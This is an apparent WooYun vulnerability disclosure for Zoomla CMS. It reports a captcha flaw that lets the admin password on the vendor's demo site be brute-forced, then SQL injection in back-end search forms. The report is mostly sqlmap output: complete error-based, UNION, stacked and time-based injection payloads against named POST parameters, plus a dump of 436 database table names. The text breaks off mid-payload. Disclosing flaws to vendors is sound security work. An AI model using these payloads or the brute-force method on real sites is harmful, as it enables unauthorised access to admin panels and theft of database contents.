当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-070959

漏洞标题:逐浪CMS最新版本从暴力注入到后台大面积SQL注入合集(验证码设计不当)

相关厂商:逐浪CMS

漏洞作者: 路人甲

提交时间:2014-08-05 19:13

修复时间:2014-11-03 19:14

公开时间:2014-11-03 19:14

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-08-05: 细节已通知厂商并且等待厂商处理中
2014-08-06: 厂商已经确认,细节仅向厂商公开
2014-08-09: 细节向第三方安全合作伙伴开放
2014-09-30: 细节向核心白帽子及相关领域专家公开
2014-10-10: 细节向普通白帽子公开
2014-10-20: 细节向实习白帽子公开
2014-11-03: 细节向公众公开

简要描述:

RT

详细说明:

问题有两个:
1.验证码设计不当可暴力猜解后台管理员账户密码;
2.后台多处注入漏洞(搜索处)可获取各种敏感信息。

漏洞证明:

#1.验证码设计不当
逐浪后台地址:http://demo.zoomla.cn/Admin/login.aspx
一开始是没有验证码的,所以我爆破,但是发现会提示验证码错误。
填上验证码抓包继续对密码字段爆破,发现可以爆破成功。

zoomla1.jpg


成功进入后台:

zoomla2.jpg


#2.大面积的SQL注入漏洞:
a.首先是商品管理搜索处

zoomla1.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123' AND 3515=CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR(104)+CHAR(108)+CHAR(113)+(SELECT (CASE WHEN (3515=3515) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(98)+CHAR(113))) AND 'Cqgx'='Cqgx&ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4
    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(115)+CHAR(104)+CHAR(108)+CHAR(113)+CHAR(120)+CHAR(81)+CHAR(83)+CHAR(66)+CHAR(119)+CHAR(87)+CHAR(74)+CHAR(73)+CHAR(100)+CHAR(89)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(98)+CHAR(113),NULL-- &ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123'; WAITFOR DELAY '0:0:5'--&ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123' WAITFOR DELAY '0:0:5'--&ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2008
current database:    'demozoomla'


436个表:

Database: demozoomla
[436 tables]
+-----------------------------------+
| ZL_3DMusic                        |
| ZL_3DPanoramic                    |
| ZL_3DShop                         |
| ZL_Accountinfo                    |
| ZL_AdZone                         |
| ZL_Adbuy                          |
| ZL_AddRessList                    |
| ZL_Advertisement                  |
| ZL_Agent                          |
| ZL_Allianceinfo                   |
| ZL_Answer                         |
| ZL_Answer_Recode                  |
| ZL_App                            |
| ZL_Arrive                         |
| ZL_ArticleOrders                  |
| ZL_ArticlePromotion               |
| ZL_Ask                            |
| ZL_AskCommon                      |
| ZL_Auction                        |
| ZL_AuditingState                  |
| ZL_Author                         |
| ZL_Baike                          |
| ZL_BaikeEdit                      |
| ZL_Bbscate                        |
| ZL_Bbstips                        |
| ZL_BiaoQian                       |
| ZL_Bid                            |
| ZL_Bider                          |
| ZL_BigLog                         |
| ZL_BindFlolar                     |
| ZL_BindPro                        |
| ZL_BlogAnswer                     |
| ZL_BlogAsk                        |
| ZL_BlogContent                    |
| ZL_BlogLiving                     |
| ZL_BookRead                       |
| ZL_BossInfo                       |
| ZL_C_Announce                     |
| ZL_C_Article                      |
| ZL_C_Factory                      |
| ZL_C_FriendSite                   |
| ZL_C_Info                         |
| ZL_C_Photo                        |
| ZL_C_Plugins                      |
| ZL_C_RedirectLink                 |
| ZL_C_soft                         |
| ZL_C_video                        |
| ZL_CallNode                       |
| ZL_CallNote                       |
| ZL_Card                           |
| ZL_CardType                       |
| ZL_Cart                           |
| ZL_CartPro                        |
| ZL_Cash                           |
| ZL_ChangeProduct                  |
| ZL_ChangeTalk                     |
| ZL_Chart                          |
| ZL_Chat                           |
| ZL_Class                          |
| ZL_ClassRoom                      |
| ZL_ClientRequire                  |
| ZL_Client_Additional              |
| ZL_Client_Basic                   |
| ZL_Client_Enterprise              |
| ZL_Client_Penson                  |
| ZL_CollectionInfo                 |
| ZL_CollectionItem                 |
| ZL_Comment                        |
| ZL_Commodities                    |
| ZL_CommonModel                    |
| ZL_CompSecretary                  |
| ZL_Compete                        |
| ZL_CompleteHistory                |
| ZL_ComponentClass                 |
| ZL_ComponentPlatform              |
| ZL_Content_ScheTask               |
| ZL_Correct                        |
| ZL_Count_Browser                  |
| ZL_Count_Iplocal                  |
| ZL_Count_Local                    |
| ZL_Count_Month                    |
| ZL_Count_Os                       |
| ZL_Count_Site                     |
| ZL_Count_Visitor                  |
| ZL_Count_Year                     |
| ZL_Count_dtproperties             |
| ZL_Course                         |
| ZL_Courseware                     |
| ZL_CpsClick                       |
| ZL_CreateJS                       |
| ZL_CrmAuthList                    |
| ZL_CustomerService                |
| ZL_DataList                       |
| ZL_DataSource                     |
| ZL_Datadic                        |
| ZL_Datadiccategory                |
| ZL_Defray                         |
| ZL_Delivier                       |
| ZL_DocList                        |
| ZL_DocModel                       |
| ZL_DocPermission                  |
| ZL_DownServer                     |
| ZL_EditWord                       |
| ZL_EnrollList                     |
| ZL_ExAnswer                       |
| ZL_ExAttendance                   |
| ZL_ExChange                       |
| ZL_ExClassgroup                   |
| ZL_ExLecturer                     |
| ZL_ExStudent                      |
| ZL_ExStudytime                    |
| ZL_ExTeacher                      |
| ZL_ExamPoint                      |
| ZL_Exam_Class                     |
| ZL_Exam_Sys_Papers                |
| ZL_Exam_Sys_Questions             |
| ZL_Exam_Type                      |
| ZL_Examination                    |
| ZL_Examinee                       |
| ZL_Exroom                         |
| ZL_FTPConfig                      |
| ZL_Favorite                       |
| ZL_File                           |
| ZL_Flow                           |
| ZL_Frient                         |
| ZL_GiftCard_User                  |
| ZL_GiftCard_shop                  |
| ZL_Grade                          |
| ZL_GradeCate                      |
| ZL_Group                          |
| ZL_GroupBuy                       |
| ZL_GroupBuyList                   |
| ZL_GroupFieldPermissions          |
| ZL_GroupModel                     |
| ZL_GuestAnswer                    |
| ZL_Guestbook                      |
| ZL_Guestcate                      |
| ZL_HidTopic                       |
| ZL_Hits                           |
| ZL_Honor                          |
| ZL_IDC_DBList                     |
| ZL_IDC_DNSSubDom                  |
| ZL_IDC_DNSTable                   |
| ZL_IDC_DomainList                 |
| ZL_IDC_DomainLog                  |
| ZL_IDC_DomainPrice                |
| ZL_IDC_DomainTemp                 |
| ZL_IDC_Log                        |
| ZL_IDC_Server                     |
| ZL_IDC_SiteList                   |
| ZL_IPUrl                          |
| ZL_IPclass                        |
| ZL_IPpara                         |
| ZL_IServer                        |
| ZL_IServerReply                   |
| ZL_Interlocution                  |
| ZL_InviteRecord                   |
| ZL_InvtoType                      |
| ZL_Keyword                        |
| ZL_Keywords                       |
| ZL_LinkName                       |
| ZL_Log                            |
| ZL_MTit                           |
| ZL_Magazine                       |
| ZL_MailIdiograph                  |
| ZL_MailInfo                       |
| ZL_MailManage                     |
| ZL_MailReceive                    |
| ZL_MailSet                        |
| ZL_MailTemp                       |
| ZL_MailType                       |
| ZL_Manager                        |
| ZL_Manufacturers                  |
| ZL_Map                            |
| ZL_MbClass                        |
| ZL_MbComment                      |
| ZL_MbTheme                        |
| ZL_Mbtopic                        |
| ZL_Message                        |
| ZL_MiUserInfo                     |
| ZL_Microb                         |
| ZL_Mis                            |
| ZL_MisApproval                    |
| ZL_MisAttendance                  |
| ZL_MisInfo                        |
| ZL_MisPlan                        |
| ZL_MisProLevel                    |
| ZL_MisProcedure                   |
| ZL_MisSign                        |
| ZL_MisType                        |
| ZL_Mis_AppProg                    |
| ZL_Mis_Model                      |
| ZL_Model                          |
| ZL_ModelField                     |
| ZL_MoneyManage                    |
| ZL_MuClass                        |
| ZL_MuPage                         |
| ZL_MuPic                          |
| ZL_MuProduct                      |
| ZL_MuTemp                         |
| ZL_MultiNode                      |
| ZL_MySubscription                 |
| ZL_Node                           |
| ZL_NodeBindDroit                  |
| ZL_NodeRole                       |
| ZL_Node_ModelTemplate             |
| ZL_OAC_111                        |
| ZL_OA_BC                          |
| ZL_OA_Document                    |
| ZL_OA_FreePro                     |
| ZL_OA_PBTable                     |
| ZL_OA_Sign                        |
| ZL_OA_UserConfig                  |
| ZL_Online                         |
| ZL_OnlineCusServ                  |
| ZL_OnlineUsers                    |
| ZL_OrderBaseField                 |
| ZL_OrderDelivery                  |
| ZL_OrderSql                       |
| ZL_Order_LuckCode                 |
| ZL_Order_PayLog                   |
| ZL_Orderinfo                      |
| ZL_P_Shop                         |
| ZL_Package                        |
| ZL_Page                           |
| ZL_PageReg                        |
| ZL_PageStyle                      |
| ZL_PageTemplate                   |
| ZL_Page_Content                   |
| ZL_Page_fwefw                     |
| ZL_Paper_Questions                |
| ZL_Papers_System                  |
| ZL_Papers_User                    |
| ZL_Passenger                      |
| ZL_PayPlat                        |
| ZL_Payment                        |
| ZL_Permission                     |
| ZL_Plan                           |
| ZL_PlanSql                        |
| ZL_PointGrounp                    |
| ZL_PointRecord                    |
| ZL_PointTrans                     |
| ZL_Present                        |
| ZL_Print                          |
| ZL_PrintMode                      |
| ZL_PrintPic                       |
| ZL_PrintType                      |
| ZL_Process                        |
| ZL_Processes                      |
| ZL_Project                        |
| ZL_ProjectAffairs                 |
| ZL_ProjectBaseField               |
| ZL_ProjectCategory                |
| ZL_ProjectDiscuss                 |
| ZL_ProjectField                   |
| ZL_ProjectType                    |
| ZL_ProjectWork                    |
| ZL_Projects                       |
| ZL_ProjectsBase                   |
| ZL_ProjectsComments               |
| ZL_PromoCount                     |
| ZL_Promotion                      |
| ZL_Promotions                     |
| ZL_Pub                            |
| ZL_Pub_TW                         |
| ZL_Pub_WTHD                       |
| ZL_Pub_WZTP                       |
| ZL_Pub_ZJDA                       |
| ZL_Pub_ZXDC                       |
| ZL_Pub_huodong                    |
| ZL_QrCode                         |
| ZL_Question                       |
| ZL_Questions                      |
| ZL_Questions_Class                |
| ZL_Questions_Knowledge            |
| ZL_Questions_Type                 |
| ZL_Questions_User                 |
| ZL_RebateOrder                    |
| ZL_Rebates                        |
| ZL_Recruitment                    |
| ZL_RedEnvelope                    |
| ZL_Redindulgence                  |
| ZL_Reg_Page                       |
| ZL_Regsterapi                     |
| ZL_Result                         |
| ZL_Role                           |
| ZL_RolePermissions                |
| ZL_RoomActive                     |
| ZL_RoomActiveJoin                 |
| ZL_RoomCall                       |
| ZL_RoomInfo                       |
| ZL_RoomMessage                    |
| ZL_RoomNotify                     |
| ZL_RoomUpFile                     |
| ZL_RoomUser                       |
| ZL_SQL                            |
| ZL_S_FloGoods                     |
| ZL_S_FloPack                      |
| ZL_S_shop                         |
| ZL_Scheme                         |
| ZL_SchemeInfo                     |
| ZL_School                         |
| ZL_ScoreStatics                   |
| ZL_Search                         |
| ZL_Sensitivity                    |
| ZL_ServiceSeat                    |
| ZL_SettlementInfoList             |
| ZL_ShopCommentary                 |
| ZL_ShopCompete                    |
| ZL_ShopGrade                      |
| ZL_ShopLable                      |
| ZL_ShopNodeinfo                   |
| ZL_Shopconfig                     |
| ZL_Shopsearch                     |
| ZL_Shopsite                       |
| ZL_ShopsiteClass                  |
| ZL_SitePas                        |
| ZL_SitePicAdv                     |
| ZL_SiteTextAdv                    |
| ZL_Sns_Active                     |
| ZL_Sns_ActiveJoin                 |
| ZL_Sns_ActivePic                  |
| ZL_Sns_ActiveType                 |
| ZL_Sns_BlogStyleTable             |
| ZL_Sns_BookTable                  |
| ZL_Sns_CarConfig                  |
| ZL_Sns_CarLog                     |
| ZL_Sns_Carlist                    |
| ZL_Sns_ChatLog                    |
| ZL_Sns_CollectTable               |
| ZL_Sns_CommendCommentOn           |
| ZL_Sns_CommentAll                 |
| ZL_Sns_FileShare                  |
| ZL_Sns_GSHuatee                   |
| ZL_Sns_GSReverCricicism           |
| ZL_Sns_GSRoom                     |
| ZL_Sns_GSType                     |
| ZL_Sns_GatherStrain               |
| ZL_Sns_GroupPicCateg              |
| ZL_Sns_HomeCollocate              |
| ZL_Sns_HomeHeadCollocate          |
| ZL_Sns_Kiss                       |
| ZL_Sns_Log                        |
| ZL_Sns_LogCriticism               |
| ZL_Sns_LookLog                    |
| ZL_Sns_LotMessage                 |
| ZL_Sns_LotNote                    |
| ZL_Sns_Memo                       |
| ZL_Sns_Messageboard               |
| ZL_Sns_MyCar                      |
| ZL_Sns_MyPose                     |
| ZL_Sns_PicCateg                   |
| ZL_Sns_PicCritique                |
| ZL_Sns_PicTure                    |
| ZL_Sns_ProductTable               |
| ZL_Sns_ProductTypetable           |
| ZL_Sns_ReplayLog                  |
| ZL_Sns_Report                     |
| ZL_Sns_SystemBannerTable          |
| ZL_Sns_SystemLog                  |
| ZL_Sns_UserLog                    |
| ZL_Sns_UserLogType                |
| ZL_Sns_UserMoreinfo               |
| ZL_Sns_UserShopProduct            |
| ZL_Sns_User_R_GS                  |
| ZL_Sns_User_R_Module              |
| ZL_Sns_blogTable                  |
| ZL_Source                         |
| ZL_SpecCate                       |
| ZL_SpecInfo                       |
| ZL_Special                        |
| ZL_Stock                          |
| ZL_StoreStyleTable                |
| ZL_Store_reg                      |
| ZL_Structure                      |
| ZL_Student                        |
| ZL_SubscriptionCount              |
| ZL_Survey                         |
| ZL_Trademark                      |
| ZL_UAgent                         |
| ZL_U_comp                         |
| ZL_U_jl                           |
| ZL_U_zp                           |
| ZL_Ucenter                        |
| ZL_UnionInfo                      |
| ZL_User                           |
| ZL_UserApp                        |
| ZL_UserBase                       |
| ZL_UserBaseField                  |
| ZL_UserCaritHis                   |
| ZL_UserCart                       |
| ZL_UserCartPro                    |
| ZL_UserClass                      |
| ZL_UserCoinHis                    |
| ZL_UserCourse                     |
| ZL_UserDay                        |
| ZL_UserExpDomP                    |
| ZL_UserExpHis                     |
| ZL_UserFave                       |
| ZL_UserFriendGroup                |
| ZL_UserFriendTable                |
| ZL_UserGrade                      |
| ZL_UserGroup                      |
| ZL_UserOrderinfo                  |
| ZL_UserPromotions                 |
| ZL_UserPurview                    |
| ZL_UserRecei                      |
| ZL_UserRegisterIP                 |
| ZL_UserRoom                       |
| ZL_UserShop                       |
| ZL_UserStock                      |
| ZL_UserStoreTable                 |
| ZL_UserStoreTypeTable             |
| ZL_VJobInfo                       |
| ZL_VResume                        |
| ZL_VRoom                          |
| ZL_VideoHall                      |
| ZL_VideoHouse                     |
| ZL_VideoHouseApply                |
| ZL_VideoInfo                      |
| ZL_VideoMessage                   |
| ZL_VideoRoom                      |
| ZL_VideoUser                      |
| ZL_VideoUserFriend                |
| ZL_VideoUserGroup                 |
| ZL_View                           |
| ZL_ViewHistory                    |
| ZL_WapArticle                     |
| ZL_WorkRole                       |
| ZL_Zone_Advertisement             |
| ZL_Zone_Node                      |
| ZL_Zone_Site                      |
| ZL_Zone_question                  |
| ZL_page_app                       |
| ZL_wxMsg                          |
| demozoomla_f.ZL_Content_WordChain |
+-----------------------------------+


b.访问评价处:

zoomla1.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: ------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTTARGET"
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTARGUMENT"
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__LASTFOCUS"
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwULLTExMTY3NDAzODcPFgQeBnN0YXR1cwJjHgV0aXRsZWUWAmYPZBYCAgMPZBYEAgEPZBYCAgEPFgIeBFRleHQFjQE8bGk+PGEgaHJlZj0nL0FkbWluL0kvTWFpbi5hc3B4Jz7lt6XkvZzlj7A8L2E+PC9saT48bGk+PGEgaHJlZj0nQ29udGVudE1hbmFnZS5hc3B4Jz7lhoXlrrnnrqHnkIY8L2E+PC9saT48bGkgY2xhc3M9J2FjdGl2ZSc+6K6/6Zeu6K+E5Lu3PC9saT5kAgMPZBYEAgMPDxYCHwIFAjI0ZGQCBA88KwARAwAPFgYeC18hRGF0YUJvdW5kZx4QVmlydHVhbEl0ZW1Db3VudAIgHgtfIUl0ZW1Db3VudAIgZAEQFgAWABYADBQrAAAWAmYPZBYYAgEPZBYOZg9kFgJmDxUBAjMzZAIBDw8WAh8CBQIzM2RkAgIPZBYCZg8VARMyMDE0LTA4LTAxIDEwOjA2OjM2ZAIDDw8WAh8CBQYmbmJzcDtkZAIED2QWAmYPFQIV6YCQ5rWq5Lqn5ZOB5bGV56S65Yy6FemAkOa1quS6p+WTgeWxleekuuWMumQCBQ8PFgIfAgUPMTE0LjI0OS4xMjAuMTcwZGQCBg9kFgJmDxUBCeW+heehruiupGQCAg9kFg5mD2QWAmYPFQECMzRkAgEPDxYCHwIFAjM0ZGQCAg9kFgJmDxUBEzIwMTQtMDgtMDEgMTA6NTE6MTJkAgMPDxYCHwIFBiZuYnNwO2RkAgQPZBYCZg8VAhXpgJDmtarkuqflk4HlsZXnpLrljLoV6YCQ5rWq5Lqn5ZOB5bGV56S65Yy6ZAIFDw8WAh8CBQ4xMDEuMjI2LjMzLjIyM2RkAgYPZBYCZg8VAQnlvoXnoa7orqRkAgMPZBYOZg9kFgJmDxUBAjM1ZAIBDw8WAh8CBQIzNWRkAgIPZBYCZg8VARMyMDE0LTA4LTAxIDE2OjU1OjIzZAIDDw8WAh8CBQR0ZXN0ZGQCBA9kFgJmDxUCG+WkmumXqOaIt+WtkOermeWIh+aNouezu+e7nxvlpJrpl6jmiLflrZDnq5nliIfmjaLns7vnu59kAgUPDxYCHwIFDTU4LjIxNS4yMjAuNjJkZAIGD2QWAmYPFQEJ5b6F56Gu6K6kZAIED2QWDmYPZBYCZg8VAQIzNmQCAQ8PFgIfAgUCMzZkZAICD2QWAmYPFQETMjAxNC0wOC0wMSAxNjo1NjoxMmQCAw8PFgIfAgUGJm5ic3A7ZGQCBA9kFgJmDxUCFemAkOa1quS6p+WTgeWxleekuuWMuhXpgJDmtarkuqflk4HlsZXnpLrljLpkAgUPDxYCHwIFDDIxOS4yMzkuOTYuM2RkAgYPZBYCZg8VAQnlvoXnoa7orqRkAgUPZBYOZg9kFgJmDxUBAjM3ZAIBDw8WAh8CBQIzN2RkAgIPZBYCZg8VARMyMDE0LTA4LTAyIDA4OjQ1OjA1ZAIDDw8WAh8CBQYmbmJzcDtkZAIED2QWAmYPFQIk5Y2D5LiH57qn5pWw5o2u5bqT6LSf6L295rWL6K+V57qn5YirJOWNg+S4h+e6p+aVsOaNruW6k+i0n+i9vea1i+ivlee6p+WIq2QCBQ8PFgIfAgUMMTQuMTE4LjU1Ljc2ZGQCBg9kFgJmDxUBCeW+heehruiupGQCBg9kFg5mD2QWAmYPFQECMzhkAgEPDxYCHwIFAjM4ZGQCAg9kFgJmDxUBEzIwMTQtMDgtMDIgMDk6MzE6MjVkAgMPDxYCHwIFBiZuYnNwO2RkAgQPZBYCZg8VAhvlpJrpl6jmiLflrZDnq5nliIfmjaLns7vnu58b5aSa6Zeo5oi35a2Q56uZ5YiH5o2i57O757ufZAIFDw8WAh8CBQ4xMTYuMjA3LjU1LjIxMGRkAgYPZBYCZg8VAQnlvoXnoa7orqRkAgcPZBYOZg9kFgJmDxUBAjM5ZAIBDw8WAh8CBQIzOWRkAgIPZBYCZg8VARMyMDE0LTA4LTAyIDA5OjQ4OjIxZAIDDw8WAh8CBQYmbmJzcDtkZAIED2QWAmYPFQIb5aSa6Zeo5oi35a2Q56uZ5YiH5o2i57O757ufG+WkmumXqOaIt+WtkOermeWIh+aNouezu+e7n2QCBQ8PFgIfAgUOMTAxLjIyNi41MS4yMjhkZAIGD2QWAmYPFQEJ5b6F56Gu6K6kZAIID2QWDmYPZBYCZg8VAQI0MGQCAQ8PFgIfAgUCNDBkZAICD2QWAmYPFQETMjAxNC0wOC0wMiAyMDowNToyOWQCAw8PFgIfAgUFYWRtaW5kZAIED2QWAmYPFQIn6J6N6IGa56e75Yqo5bqU55So5LiO5qGM6Z2i6L2v5Lu25bmz5Y+wJ+iejeiBmuenu+WKqOW6lOeUqOS4juahjOmdoui9r+S7tuW5s+WPsGQCBQ8PFgIfAgULNTguNTAuMTQuOTlkZAIGD2QWAmYPFQEJ5b6F56Gu6K6kZAIJD2QWDmYPZBYCZg8VAQI0MWQCAQ8PFgIfAgUCNDFkZAICD2QWAmYPFQETMjAxNC0wOC0wMyAwNDoyMzo1NWQCAw8PFgIfAgUGJm5ic3A7ZGQCBA9kFgJmDxUCJOWNg+S4h+e6p+aVsOaNruW6k+i0n+i9vea1i+ivlee6p+WIqyTljYPkuIfnuqfmlbDmja7lupPotJ/ovb3mtYvor5XnuqfliKtkAgUPDxYCHwIFDzE4MC4xNTMuMjA1LjI1M2RkAgYPZBYCZg8VAQnlvoXnoa7orqRkAgoPZBYOZg9kFgJmDxUBAjQyZAIBDw8WAh8CBQI0MmRkAgIPZBYCZg8VARMyMDE0LTA4LTAzIDA0OjIzOjU1ZAIDDw8WAh8CBQYmbmJzcDtkZAIED2QWAmYPFQIk5Y2D5LiH57qn5pWw5o2u5bqT6LSf6L295rWL6K+V57qn5YirJOWNg+S4h+e6p+aVsOaNruW6k+i0n+i9vea1i+ivlee6p+WIq2QCBQ8PFgIfAgUNMTQuMTA3LjIwNS45MWRkAgYPZBYCZg8VAQnlvoXnoa7orqRkAgsPDxYCHgdWaXNpYmxlaGRkAgwPZBYCZg9kFgQCAQ8PFgIfAgUCMzJkZAIWDxAPFgIfA2dkEBUEATEBMgEzATQVBAExATIBMwE0FCsDBGdnZ2cWAWZkGAEFEWN0bDAwJENvbnRlbnQkRWd2DzwrAAwDBhUBAklEBxQrAAoUKwABAiEUKwABAiIUKwABAiMUKwABAiQUKwABAiUUKwABAiYUKwABAicUKwABAigUKwABAikUKwABAioIAgRkmIUN+QajY8XCYHl94YGf479+Juhbv5otzNBlCeQ9aRk=
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTitle"
123456%' AND 2825=CONVERT(INT,(SELECT CHAR(113)+CHAR(114)+CHAR(121)+CHAR(105)+CHAR(113)+(SELECT (CASE WHEN (2825=2825) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(117)+CHAR(121)+CHAR(105)+CHAR(113))) AND '%'='
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTime"
2014-08
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$btnSeach"
??��������
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06"
10
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07"
1
------WebKitFormBoundary5n6dB9dFzpkAYygr--
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: ------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTTARGET"
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTARGUMENT"
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__LASTFOCUS"
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwULLTExMTY3NDAzODcPFgQeBnN0YXR1cwJjHgV0aXRsZWUWAmYPZBYCAgMPZBYEAgEPZBYCAgEPFgIeBFRleHQFjQE8bGk+PGEgaHJlZj0nL0FkbWluL0kvTWFpbi5hc3B4Jz7lt6XkvZzlj7A8L2E+PC9saT48bGk+PGEgaHJlZj0nQ29udGVudE1hbmFnZS5hc3B4Jz7lhoXlrrnnrqHnkIY8L2E+PC9saT48bGkgY2xhc3M9J2FjdGl2ZSc+6K6/6Zeu6K+E5Lu3PC9saT5kAgMPZBYEAgMPDxYCHwIFAjI0ZGQCBA88KwARAwAPFgYeC18hRGF0YUJvdW5kZx4QVmlydHVhbEl0ZW1Db3VudAIgHgtfIUl0ZW1Db3VudAIgZAEQFgAWABYADBQrAAAWAmYPZBYYAgEPZBYOZg9kFgJmDxUBAjMzZAIBDw8WAh8CBQIzM2RkAgIPZBYCZg8VARMyMDE0LTA4LTAxIDEwOjA2OjM2ZAIDDw8WAh8CBQYmbmJzcDtkZAIED2QWAmYPFQIV6YCQ5rWq5Lqn5ZOB5bGV56S65Yy6FemAkOa1quS6p+WTgeWxleekuuWMumQCBQ8PFgIfAgUPMTE0LjI0OS4xMjAuMTcwZGQCBg9kFgJmDxUBCeW+heehruiupGQCAg9kFg5mD2QWAmYPFQECMzRkAgEPDxYCHwIFAjM0ZGQCAg9kFgJmDxUBEzIwMTQtMDgtMDEgMTA6NTE6MTJkAgMPDxYCHwIFBiZuYnNwO2RkAgQPZBYCZg8VAhXpgJDmtarkuqflk4HlsZXnpLrljLoV6YCQ5rWq5Lqn5ZOB5bGV56S65Yy6ZAIFDw8WAh8CBQ4xMDEuMjI2LjMzLjIyM2RkAgYPZBYCZg8VAQnlvoXnoa7orqRkAgMPZBYOZg9kFgJmDxUBAjM1ZAIBDw8WAh8CBQIzNWRkAgIPZBYCZg8VARMyMDE0LTA4LTAxIDE2OjU1OjIzZAIDDw8WAh8CBQR0ZXN0ZGQCBA9kFgJmDxUCG+WkmumXqOaIt+WtkOermeWIh+aNouezu+e7nxvlpJrpl6jmiLflrZDnq5nliIfmjaLns7vnu59kAgUPDxYCHwIFDTU4LjIxNS4yMjAuNjJkZAIGD2QWAmYPFQEJ5b6F56Gu6K6kZAIED2QWDmYPZBYCZg8VAQIzNmQCAQ8PFgIfAgUCMzZkZAICD2QWAmYPFQETMjAxNC0wOC0wMSAxNjo1NjoxMmQCAw8PFgIfAgUGJm5ic3A7ZGQCBA9kFgJmDxUCFemAkOa1quS6p+WTgeWxleekuuWMuhXpgJDmtarkuqflk4HlsZXnpLrljLpkAgUPDxYCHwIFDDIxOS4yMzkuOTYuM2RkAgYPZBYCZg8VAQnlvoXnoa7orqRkAgUPZBYOZg9kFgJmDxUBAjM3ZAIBDw8WAh8CBQIzN2RkAgIPZBYCZg8VARMyMDE0LTA4LTAyIDA4OjQ1OjA1ZAIDDw8WAh8CBQYmbmJzcDtkZAIED2QWAmYPFQIk5Y2D5LiH57qn5pWw5o2u5bqT6LSf6L295rWL6K+V57qn5YirJOWNg+S4h+e6p+aVsOaNruW6k+i0n+i9vea1i+ivlee6p+WIq2QCBQ8PFgIfAgUMMTQuMTE4LjU1Ljc2ZGQCBg9kFgJmDxUBCeW+heehruiupGQCBg9kFg5mD2QWAmYPFQECMzhkAgEPDxYCHwIFAjM4ZGQCAg9kFgJmDxUBEzIwMTQtMDgtMDIgMDk6MzE6M